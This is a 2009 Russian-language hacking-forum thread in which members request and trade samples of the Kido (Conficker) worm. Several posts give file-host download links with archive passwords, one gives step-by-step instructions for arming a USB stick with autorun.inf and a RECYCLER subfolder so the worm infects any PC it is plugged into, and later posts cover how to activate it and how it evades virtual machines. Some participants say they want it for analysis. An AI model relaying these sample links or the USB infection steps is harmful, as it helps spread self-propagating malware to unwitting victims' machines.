Разыскиваю вирус kido

Discussion in 'Безопасность и Анонимность' started by neprovad, 28 Feb 2009.

  1. neprovad

    neprovad Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    899
    Likes Received:
    274
    Reputations:
    59
    Сабж, ищу данный вирус. Если у кого есть, поделитесь, а то сам найти все не могу :(
     
  2. MaZaHaKer

    MaZaHaKer Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    93
    Likes Received:
    33
    Reputations:
    0
    sxijql.dll - Kido.ih
    161 кб
    Качать тут : http://www.sendspace.com/file/cqyzsu , пароль : antichat

    http://www.virustotal.com/ru/analisis/f578a6c9894fd7c2dc7799f7330b3b18
    http://www.viruslist.com/ru/viruses/encyclopedia?virusid=21782790
     
    2 people like this.
  3. neprovad

    neprovad Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    899
    Likes Received:
    274
    Reputations:
    59
    перезалей пожалуйста, скачать не удается
    Code:
    The download link has been updated (error: #12).
    You may now download the file.
    
    и не получается скачать, редиректит бесконечно
     
  4. MaZaHaKer

    MaZaHaKer Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    93
    Likes Received:
    33
    Reputations:
    0
    странно у меня все нормально ... ладно перезалил :)

    http://www.axifile.com/?1364946
    http://www.rapidshare.ru/944781
    http://www.filefactory.com/file/af2725f/n/1_rar
    http://up-file.com/download/9616002cff4ab862f7c4712ad1c1d1dac


    пароль тот же : antichat
     
  5. neprovad

    neprovad Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    899
    Likes Received:
    274
    Reputations:
    59
    Тему можно закрыть, сабж получен, всем спасибо)
     
  6. nester

    nester New Member

    Joined:
    5 May 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    разыскиваю вирус Kido для самостоятельного анализа

    Не один день разыскиваю вирус Kido. Хотелось бы глянуть за его сетевой активностью. Однако все пришедшие мне с флэшками образцы почему-то не размножались. Все найденное на Malwaresearch.com при запуске выдавало сообщение “программа не умещается в памяти”. Честно сознаюсь, dll найденную в этом разделе пока никак не могу запустить. Просто исполняемый файлик есть?
     
  7. Karantin

    Karantin Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    330
    Likes Received:
    146
    Reputations:
    24
    http://rapidshare.com/files/186243825/danger.zip
    password: infected
    Put autorun.inf file on a USB stick. Then create a folder named "RECYCLER" on USB stick.
    Then create another foilder named "S-5-3-42-2819952290-8240758988-879315005-3665" inside this RECYCLER folder.
    U r ready to go. Plugin this USB device to any PC and click on it. Do it on ur own risk.
     
    1 person likes this.
  8. Not Found...

    Not Found... Banned

    Joined:
    18 Apr 2009
    Messages:
    26
    Likes Received:
    52
    Reputations:
    7
    +1...давно её искал..Kido всмысле)
     
  9. nester

    nester New Member

    Joined:
    5 May 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    Заразил виртуалку XP SP2. По началу ProcMon показал активность и все, тишина. Ни на флешки, ни по сети дальше не ползет. Может его надо еще и спровоцировать или таймбомб уже дезактивирован?!
     
  10. LEE_ROY

    LEE_ROY Elder - Старейшина

    Joined:
    9 Nov 2006
    Messages:
    450
    Likes Received:
    188
    Reputations:
    26
    может у него детект вмваре всеголиш? ;)
     
  11. nester

    nester New Member

    Joined:
    5 May 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    Мысль интересная! Пробовал запустить без ухищрений виртуализации, тоже пока тихо. Без признаков жизни :)
     
  12. dessametr

    dessametr Banned

    Joined:
    21 Mar 2009
    Messages:
    114
    Likes Received:
    93
    Reputations:
    7
    перезалейте на ifolder или letibit
     
  13. nester

    nester New Member

    Joined:
    5 May 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    http://ifolder.ru/11992594
     
  14. dessametr

    dessametr Banned

    Joined:
    21 Mar 2009
    Messages:
    114
    Likes Received:
    93
    Reputations:
    7
    Спасибо что залил,а как им пользоваться?Просто отсылать на комп?
     
  15. nester

    nester New Member

    Joined:
    5 May 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    Для активации необходимо распаковать архив на флэшку и подмонтировать в windows xp.
     
  16. 043nKRuT0y

    043nKRuT0y Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    226
    Likes Received:
    8
    Reputations:
    0
    Да не только ВМВары ! Он распознает любую виртуальную среду и эмуляторы, защищаясь от отладки ;) Не пионеры всетаки вирус писали =)

    Гдето был пост мол на Вару есть патчи или еще чтото что прикрывает виртуальную среду ! Точно не помню.... даже на ачате был топик ! Точно помню одно - патчик этот приват , найти не просто !!!
     
  17. nester

    nester New Member

    Joined:
    5 May 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    Ценная информация! Спасибо! Будем значит искать патчик...
     
  18. xismyname

    xismyname Elder - Старейшина

    Joined:
    7 Sep 2008
    Messages:
    77
    Likes Received:
    7
    Reputations:
    -5
    Интересно, а .exe даннго червя у кого нибудь есть ? Если да, залейте куда нибудь плз...